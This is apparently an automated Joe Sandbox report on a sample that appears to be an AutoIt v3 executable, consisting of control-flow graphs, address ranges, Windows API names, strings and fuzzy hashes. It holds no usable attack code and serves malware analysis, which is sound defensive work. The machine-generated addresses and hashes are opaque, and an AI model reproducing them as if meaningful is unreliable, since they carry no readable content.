                                                            control_flow_graph 482 7ff75f161d80-7ff75f161e17 call 7ff75f149640 GetVersionExW call 7ff75f147cf4 487 7ff75f1a9450 482->487 488 7ff75f161e1d 482->488 489 7ff75f1a9457-7ff75f1a945d 487->489 490 7ff75f161e20-7ff75f161e46 call 7ff75f14dda4 488->490 491 7ff75f1a9463-7ff75f1a9480 489->491 496 7ff75f161e4c 490->496 497 7ff75f161fc1 490->497 491->491 493 7ff75f1a9482-7ff75f1a9485 491->493 493->490 495 7ff75f1a948b-7ff75f1a9491 493->495 495->489 498 7ff75f1a9493 495->498 499 7ff75f161e53-7ff75f161e59 496->499 497->487 501 7ff75f1a9498-7ff75f1a94a1 498->501 500 7ff75f161e5f-7ff75f161e7c 499->500 500->500 502 7ff75f161e7e-7ff75f161e81 500->502 501->499 504 7ff75f1a94a7 501->504 502->501 503 7ff75f161e87-7ff75f161ed6 call 7ff75f14dda4 502->503 507 7ff75f161edc-7ff75f161ede 503->507 508 7ff75f1a9645-7ff75f1a964d 503->508 504->497 511 7ff75f161ee4-7ff75f161efa 507->511 512 7ff75f1a94ac-7ff75f1a94af 507->512 509 7ff75f1a964f-7ff75f1a9658 508->509 510 7ff75f1a965a-7ff75f1a965d 508->510 513 7ff75f1a9686-7ff75f1a9692 509->513 510->513 514 7ff75f1a965f-7ff75f1a9674 510->514 515 7ff75f1a9572-7ff75f1a9579 511->515 516 7ff75f161f00-7ff75f161f02 511->516 517 7ff75f161f3c-7ff75f161f80 GetCurrentProcess IsWow64Process call 7ff75f166240 512->517 518 7ff75f1a94b5-7ff75f1a9501 512->518 527 7ff75f1a969d-7ff75f1a96b3 call 7ff75f1b32f4 513->527 519 7ff75f1a967f 514->519 520 7ff75f1a9676-7ff75f1a967d 514->520 521 7ff75f1a9589-7ff75f1a9599 515->521 522 7ff75f1a957b-7ff75f1a9584 515->522 523 7ff75f161f08-7ff75f161f0b 516->523 524 7ff75f1a959e-7ff75f1a95b3 516->524 517->527 541 7ff75f161f86-7ff75f161f8b GetSystemInfo 517->541 518->517 526 7ff75f1a9507-7ff75f1a950e 518->526 519->513 520->513 521->517 522->517 528 7ff75f1a95ed-7ff75f1a95f0 523->528 529 7ff75f161f11-7ff75f161f2d 523->529 530 7ff75f1a95b5-7ff75f1a95be 524->530 531 7ff75f1a95c3-7ff75f1a95d3 524->531 533 7ff75f1a9510-7ff75f1a9518 526->533 534 7ff75f1a9534-7ff75f1a953c 526->534 550 7ff75f1a96b5-7ff75f1a96d5 call 7ff75f1b32f4 527->550 551 7ff75f1a96d7-7ff75f1a96dc GetSystemInfo 527->551 528->517 540 7ff75f1a95f6-7ff75f1a9620 528->540 538 7ff75f161f33 529->538 539 7ff75f1a95d8-7ff75f1a95e8 529->539 530->517 531->517 542 7ff75f1a9526-7ff75f1a952f 533->542 543 7ff75f1a951a-7ff75f1a9521 533->543 535 7ff75f1a953e-7ff75f1a9547 534->535 536 7ff75f1a954c-7ff75f1a9554 534->536 535->517 544 7ff75f1a9556-7ff75f1a955f 536->544 545 7ff75f1a9564-7ff75f1a956d 536->545 538->517 539->517 547 7ff75f1a9622-7ff75f1a962b 540->547 548 7ff75f1a9630-7ff75f1a9640 540->548 549 7ff75f161f91-7ff75f161fc0 541->549 542->517 543->517 544->517 545->517 547->517 548->517 552 7ff75f1a96e2-7ff75f1a96ea 550->552 551->552 552->549 554 7ff75f1a96f0-7ff75f1a96f7 FreeLibrary 552->554 554->549
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentInfoSystemVersionWow64
                                                            • String ID: |O
                                                            • API String ID: 1568231622-607156228
                                                            • Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                            • Instruction ID: ae0ce194c706a407b03a5328b4cf533f75a0d3d0f39f3cc9560e4afa43788cc2
                                                            • Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                            • Instruction Fuzzy Hash: 44D180E1A1D2C686EE21EB14B8001FDBB51AF55788FCE4076D68E036A1DF6CB644C772

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 719 7ff75f1df630-7ff75f1df69e call 7ff75f166240 722 7ff75f1df6d4-7ff75f1df6d9 719->722 723 7ff75f1df6a0-7ff75f1df6b8 call 7ff75f14ffbc 719->723 725 7ff75f1df6db-7ff75f1df6ef call 7ff75f14ffbc 722->725 726 7ff75f1df71e-7ff75f1df723 722->726 733 7ff75f1df708-7ff75f1df70d 723->733 734 7ff75f1df6ba-7ff75f1df6d2 call 7ff75f14ffbc 723->734 736 7ff75f1df6f3-7ff75f1df706 call 7ff75f14ffbc 725->736 727 7ff75f1df736-7ff75f1df75c call 7ff75f14d4cc call 7ff75f14e330 726->727 728 7ff75f1df725-7ff75f1df729 726->728 748 7ff75f1df840-7ff75f1df84a 727->748 749 7ff75f1df762-7ff75f1df7cf call 7ff75f14d4cc call 7ff75f14e330 call 7ff75f14d4cc call 7ff75f14e330 call 7ff75f14d4cc call 7ff75f14e330 727->749 732 7ff75f1df72d-7ff75f1df732 call 7ff75f14ffbc 728->732 732->727 737 7ff75f1df70f-7ff75f1df717 733->737 738 7ff75f1df719-7ff75f1df71c 733->738 734->736 736->726 736->733 737->732 738->726 738->727 751 7ff75f1df84c-7ff75f1df86e call 7ff75f14d4cc call 7ff75f14e330 748->751 752 7ff75f1df87d-7ff75f1df8af GetCurrentDirectoryW call 7ff75f164c68 GetCurrentDirectoryW 748->752 799 7ff75f1df806-7ff75f1df83e GetSystemDirectoryW call 7ff75f164c68 GetSystemDirectoryW 749->799 800 7ff75f1df7d1-7ff75f1df7f3 call 7ff75f14d4cc call 7ff75f14e330 749->800 751->752 769 7ff75f1df870-7ff75f1df87b call 7ff75f168d58 751->769 760 7ff75f1df8b5-7ff75f1df8b8 752->760 763 7ff75f1df8f0-7ff75f1df8ff call 7ff75f1bf464 760->763 764 7ff75f1df8ba-7ff75f1df8eb call 7ff75f15f688 * 3 760->764 777 7ff75f1df905-7ff75f1df95d call 7ff75f1bfddc call 7ff75f1bfca8 call 7ff75f1bfafc 763->777 778 7ff75f1df901-7ff75f1df903 763->778 764->763 769->752 769->763 779 7ff75f1df964-7ff75f1df96c 777->779 807 7ff75f1df95f 777->807 778->779 784 7ff75f1dfa0f-7ff75f1dfa4b CreateProcessW 779->784 785 7ff75f1df972-7ff75f1dfa0d call 7ff75f1ad1f8 call 7ff75f168d58 * 3 call 7ff75f164c24 * 3 779->785 789 7ff75f1dfa4f-7ff75f1dfa62 call 7ff75f164c24 * 2 784->789 785->789 812 7ff75f1dfa64-7ff75f1dfabc call 7ff75f144afc * 2 GetLastError call 7ff75f15f214 call 7ff75f1513e0 789->812 813 7ff75f1dfabe-7ff75f1dfaca CloseHandle 789->813 799->760 800->799 822 7ff75f1df7f5-7ff75f1df800 call 7ff75f168d58 800->822 807->779 826 7ff75f1dfb3b-7ff75f1dfb65 call 7ff75f1bf51c 812->826 817 7ff75f1dfaf5-7ff75f1dfafc 813->817 818 7ff75f1dfacc-7ff75f1dfaf0 call 7ff75f1bf7dc call 7ff75f1c0088 call 7ff75f1dfb68 813->818 824 7ff75f1dfb0c-7ff75f1dfb35 call 7ff75f1513e0 CloseHandle 817->824 825 7ff75f1dfafe-7ff75f1dfb0a 817->825 818->817 822->760 822->799 824->826 825->826
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Directory$Handle$CloseCurrentLockSyncSystem$CreateErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 1787492119-0
                                                            • Opcode ID: b5529a047433c39029aa94f7abef1aaae7ba2a451b0d80efb392d77c1937dd44
                                                            • Instruction ID: 29c5bef4f72508534a37c8c6bf92ecaa36442f00e3ef64d70f8e66723eb13bdb
                                                            • Opcode Fuzzy Hash: b5529a047433c39029aa94f7abef1aaae7ba2a451b0d80efb392d77c1937dd44
                                                            • Instruction Fuzzy Hash: 72E1A022A08BC186EF44EB26E4501FDA7B1FB84B94F884536EE5D87799DF38E401C720
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                            • String ID:
                                                            • API String ID: 2695905019-0
                                                            • Opcode ID: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                            • Instruction ID: 9ebc79af88040029f856e490cb5d0f53d81450801ec391300b72be3564e907e4
                                                            • Opcode Fuzzy Hash: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                            • Instruction Fuzzy Hash: 1EF01950D18682C2EF247B25B8483B593A0AF95B75FDC4330D57F062E4DF6CD85A4520

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                            • API String ID: 2667193904-1575078665
                                                            • Opcode ID: e4a1d1e4efa0bc87a7461a6a39f11fb0c9c767336ce2d992286509dae00062b4
                                                            • Instruction ID: 88d8148bf59b74549f6eeb36385429dcac1ca405976371edd5b7ce55aeffeebb
                                                            • Opcode Fuzzy Hash: e4a1d1e4efa0bc87a7461a6a39f11fb0c9c767336ce2d992286509dae00062b4
                                                            • Instruction Fuzzy Hash: 61912962A18AC795EB10FB24F8400F9B365FF84784BC81136EA4D46AE9EF6CD545C760

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 131 7ff75f145dec-7ff75f145e21 133 7ff75f145e91-7ff75f145e94 131->133 134 7ff75f145e23-7ff75f145e26 131->134 133->134 135 7ff75f145e96 133->135 136 7ff75f145e98 134->136 137 7ff75f145e28-7ff75f145e2f 134->137 138 7ff75f145e6b-7ff75f145e76 DefWindowProcW 135->138 139 7ff75f145e9e-7ff75f145ea3 136->139 140 7ff75f18c229-7ff75f18c261 call 7ff75f15ede4 call 7ff75f162c44 136->140 141 7ff75f145f21-7ff75f145f29 PostQuitMessage 137->141 142 7ff75f145e35-7ff75f145e3a 137->142 146 7ff75f145e7c-7ff75f145e90 138->146 148 7ff75f145ecc-7ff75f145efa SetTimer RegisterWindowMessageW 139->148 149 7ff75f145ea5-7ff75f145ea8 139->149 175 7ff75f18c267-7ff75f18c26e 140->175 147 7ff75f145ec8-7ff75f145eca 141->147 143 7ff75f18c2af-7ff75f18c2c5 call 7ff75f1ba40c 142->143 144 7ff75f145e40-7ff75f145e43 142->144 143->147 167 7ff75f18c2cb 143->167 150 7ff75f145e49-7ff75f145e4e 144->150 151 7ff75f145f2b-7ff75f145f35 call 7ff75f164610 144->151 147->146 148->147 152 7ff75f145efc-7ff75f145f09 CreatePopupMenu 148->152 155 7ff75f145eae-7ff75f145ebe KillTimer call 7ff75f145d88 149->155 156 7ff75f18c1b8-7ff75f18c1bb 149->156 157 7ff75f18c292-7ff75f18c299 150->157 158 7ff75f145e54-7ff75f145e59 150->158 169 7ff75f145f3a 151->169 152->147 172 7ff75f145ec3 call 7ff75f147098 155->172 162 7ff75f18c1f7-7ff75f18c224 MoveWindow 156->162 163 7ff75f18c1bd-7ff75f18c1c0 156->163 157->138 173 7ff75f18c29f-7ff75f18c2aa call 7ff75f1ac54c 157->173 165 7ff75f145f0b-7ff75f145f1f call 7ff75f145f3c 158->165 166 7ff75f145e5f-7ff75f145e65 158->166 162->147 170 7ff75f18c1c2-7ff75f18c1c5 163->170 171 7ff75f18c1e4-7ff75f18c1f2 SetFocus 163->171 165->147 166->138 166->175 167->138 169->147 170->166 176 7ff75f18c1cb-7ff75f18c1df call 7ff75f15ede4 170->176 171->147 172->147 173->138 175->138 181 7ff75f18c274-7ff75f18c28d call 7ff75f145d88 call 7ff75f146258 175->181 176->147 181->138
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated
                                                            • API String ID: 129472671-2362178303
                                                            • Opcode ID: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                            • Instruction ID: be24ca065d9bea4dbbb269b77076873b05999ea510ef323eb3d7c7890136557a
                                                            • Opcode Fuzzy Hash: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                            • Instruction Fuzzy Hash: 735127B1E0C6CA81FE24BB14BA481F9E651BF85B84FCC0435D54E526E2EFACE5059731

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-2659433951
                                                            • Opcode ID: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                            • Instruction ID: 3e93a1d06f8cae9bfc14fe8c4ae66ee4c19066ef3c6e27baa45195fe2932710e
                                                            • Opcode Fuzzy Hash: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                            • Instruction Fuzzy Hash: DB312A72A04B858AEB00DF61F8843AC77B4FB44748F980135CA4D17794DF7C9159CB60

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 189 7ff75f15e958-7ff75f15e9ae 190 7ff75f1a27e4-7ff75f1a27ea DestroyWindow 189->190 191 7ff75f15e9b4-7ff75f15e9d3 mciSendStringW 189->191 194 7ff75f1a27f0-7ff75f1a2801 190->194 192 7ff75f15ecbd-7ff75f15ecce 191->192 193 7ff75f15e9d9-7ff75f15e9e3 191->193 196 7ff75f15ecf7-7ff75f15ed01 192->196 197 7ff75f15ecd0-7ff75f15ecf0 UnregisterHotKey 192->197 193->194 195 7ff75f15e9e9 193->195 199 7ff75f1a2803-7ff75f1a2806 194->199 200 7ff75f1a2835-7ff75f1a283f 194->200 198 7ff75f15e9f0-7ff75f15e9f3 195->198 196->193 202 7ff75f15ed07 196->202 197->196 201 7ff75f15ecf2 call 7ff75f15f270 197->201 204 7ff75f15e9f9-7ff75f15ea08 call 7ff75f143aa8 198->204 205 7ff75f15ecb0-7ff75f15ecb8 call 7ff75f145410 198->205 206 7ff75f1a2813-7ff75f1a2817 FindClose 199->206 207 7ff75f1a2808-7ff75f1a2811 call 7ff75f148314 199->207 200->194 203 7ff75f1a2841 200->203 201->196 202->192 213 7ff75f1a2846-7ff75f1a284f call 7ff75f1d8c00 203->213 219 7ff75f15ea0f-7ff75f15ea12 204->219 205->198 212 7ff75f1a281d-7ff75f1a282e 206->212 207->212 212->200 217 7ff75f1a2830 call 7ff75f1c3180 212->217 213->219 217->200 219->213 222 7ff75f15ea18 219->222 223 7ff75f15ea1f-7ff75f15ea22 222->223 224 7ff75f1a2854-7ff75f1a285d call 7ff75f1b46cc 223->224 225 7ff75f15ea28-7ff75f15ea32 223->225 224->223 227 7ff75f1a2862-7ff75f1a2873 225->227 228 7ff75f15ea38-7ff75f15ea42 225->228 230 7ff75f1a2875 FreeLibrary 227->230 231 7ff75f1a287b-7ff75f1a2885 227->231 232 7ff75f15ea48-7ff75f15ea76 call 7ff75f1513e0 228->232 233 7ff75f1a288c-7ff75f1a289d 228->233 230->231 231->227 235 7ff75f1a2887 231->235 242 7ff75f15ea78 232->242 243 7ff75f15eabf-7ff75f15eacc OleUninitialize 232->243 236 7ff75f1a289f-7ff75f1a28c2 VirtualFree 233->236 237 7ff75f1a28c9-7ff75f1a28d3 233->237 235->233 236->237 238 7ff75f1a28c4 call 7ff75f1c321c 236->238 237->233 240 7ff75f1a28d5 237->240 238->237 245 7ff75f1a28da-7ff75f1a28de 240->245 244 7ff75f15ea7d-7ff75f15eabd call 7ff75f15f1c4 call 7ff75f15f13c 242->244 243->245 246 7ff75f15ead2-7ff75f15ead9 243->246 244->243 245->246 248 7ff75f1a28e4-7ff75f1a28ef 245->248 249 7ff75f1a28f4-7ff75f1a2903 call 7ff75f1c31d4 246->249 250 7ff75f15eadf-7ff75f15eaea 246->250 248->246 261 7ff75f1a2905 249->261 253 7ff75f15ed09-7ff75f15ed18 call 7ff75f1642a0 250->253 254 7ff75f15eaf0-7ff75f15eb22 call 7ff75f14a07c call 7ff75f15f08c call 7ff75f1439bc 250->254 253->254 264 7ff75f15ed1e 253->264 273 7ff75f15eb2e-7ff75f15ebc4 call 7ff75f1439bc call 7ff75f14a07c call 7ff75f1445c8 * 2 call 7ff75f14a07c * 3 call 7ff75f1513e0 call 7ff75f15ee68 call 7ff75f15ee2c * 3 254->273 274 7ff75f15eb24-7ff75f15eb29 call 7ff75f164c24 254->274 266 7ff75f1a290a-7ff75f1a2919 call 7ff75f1b3a78 261->266 264->253 272 7ff75f1a291b 266->272 277 7ff75f1a2920-7ff75f1a292f call 7ff75f15e4e4 272->277 273->266 316 7ff75f15ebca-7ff75f15ebdc call 7ff75f1439bc 273->316 274->273 283 7ff75f1a2931 277->283 286 7ff75f1a2936-7ff75f1a2945 call 7ff75f1c3078 283->286 292 7ff75f1a2947 286->292 296 7ff75f1a294c-7ff75f1a295b call 7ff75f1c31a8 292->296 301 7ff75f1a295d 296->301 304 7ff75f1a2962-7ff75f1a2971 call 7ff75f1c31a8 301->304 310 7ff75f1a2973 304->310 310->310 316->277 319 7ff75f15ebe2-7ff75f15ebec 316->319 319->286 320 7ff75f15ebf2-7ff75f15ec08 call 7ff75f14a07c 319->320 323 7ff75f15ec0e-7ff75f15ec18 320->323 324 7ff75f15ed20-7ff75f15ed25 call 7ff75f164c24 320->324 326 7ff75f15ec8a-7ff75f15eca9 call 7ff75f14a07c call 7ff75f164c24 323->326 327 7ff75f15ec1a-7ff75f15ec24 323->327 324->190 337 7ff75f15ecab 326->337 327->296 329 7ff75f15ec2a-7ff75f15ec3b 327->329 329->304 332 7ff75f15ec41-7ff75f15ed71 call 7ff75f14a07c * 3 call 7ff75f15ee10 call 7ff75f15ed8c 329->332 347 7ff75f15ed77-7ff75f15ed88 332->347 348 7ff75f1a2978-7ff75f1a2987 call 7ff75f1cd794 332->348 337->327 351 7ff75f1a2989 348->351 351->351
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: DestroySendStringUninitializeUnregisterWindow
                                                            • String ID: close all
                                                            • API String ID: 1992507300-3243417748
                                                            • Opcode ID: 0215e1cc10e3ea8240ae12a3d7c0b21f24d7e33af532eefbf93780fbe33f8b49
                                                            • Instruction ID: 38ed4f09545f109b63a85c0706ed1e1f8a6b77d89ce1dfe234ddfebd2ff2d799
                                                            • Opcode Fuzzy Hash: 0215e1cc10e3ea8240ae12a3d7c0b21f24d7e33af532eefbf93780fbe33f8b49
                                                            • Instruction Fuzzy Hash: 35E12125F0A98281EE58FF16E5602FCA360BF94B44F9C4075DB4E57291DF3CE8628B64

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: AutoIt v3
                                                            • API String ID: 423443420-1704141276
                                                            • Opcode ID: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                            • Instruction ID: 9f342112b4fa938c20d0e671c510ea12e92ca7a43d3903c51af170eb9de3f4df
                                                            • Opcode Fuzzy Hash: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                            • Instruction Fuzzy Hash: 7D3117B6E08B868AEB40EB51F8443ACB774FB88759F880039CA8D53B94DF7DD1558760

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 419 7ff75f187348-7ff75f1873ba call 7ff75f187078 422 7ff75f1873bc-7ff75f1873c4 call 7ff75f1755b4 419->422 423 7ff75f1873d3-7ff75f1873dd call 7ff75f17e418 419->423 428 7ff75f1873c7-7ff75f1873ce call 7ff75f1755d4 422->428 429 7ff75f1873f7-7ff75f187463 CreateFileW 423->429 430 7ff75f1873df-7ff75f1873f5 call 7ff75f1755b4 call 7ff75f1755d4 423->430 442 7ff75f18771a-7ff75f187736 428->442 433 7ff75f1874eb-7ff75f1874f6 GetFileType 429->433 434 7ff75f187469-7ff75f187470 429->434 430->428 436 7ff75f187549-7ff75f18754f 433->436 437 7ff75f1874f8-7ff75f187533 GetLastError call 7ff75f175564 CloseHandle 433->437 439 7ff75f1874b8-7ff75f1874e6 GetLastError call 7ff75f175564 434->439 440 7ff75f187472-7ff75f187476 434->440 445 7ff75f187556-7ff75f187559 436->445 446 7ff75f187551-7ff75f187554 436->446 437->428 453 7ff75f187539-7ff75f187544 call 7ff75f1755d4 437->453 439->428 440->439 447 7ff75f187478-7ff75f1874b6 CreateFileW 440->447 451 7ff75f18755e-7ff75f1875ac call 7ff75f17e334 445->451 452 7ff75f18755b 445->452 446->451 447->433 447->439 457 7ff75f1875ae-7ff75f1875ba call 7ff75f187284 451->457 458 7ff75f1875c0-7ff75f1875ea call 7ff75f186de4 451->458 452->451 453->428 464 7ff75f1875bc 457->464 465 7ff75f1875ef-7ff75f1875f9 call 7ff75f1804b8 457->465 466 7ff75f1875fe-7ff75f187643 458->466 467 7ff75f1875ec 458->467 464->458 465->442 469 7ff75f187665-7ff75f187671 466->469 470 7ff75f187645-7ff75f187649 466->470 467->465 471 7ff75f187718 469->471 472 7ff75f187677-7ff75f18767b 469->472 470->469 474 7ff75f18764b-7ff75f187660 470->474 471->442 472->471 475 7ff75f187681-7ff75f1876c9 CloseHandle CreateFileW 472->475 474->469 476 7ff75f1876fe-7ff75f187713 475->476 477 7ff75f1876cb-7ff75f1876f9 GetLastError call 7ff75f175564 call 7ff75f17e548 475->477 476->471 477->476
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
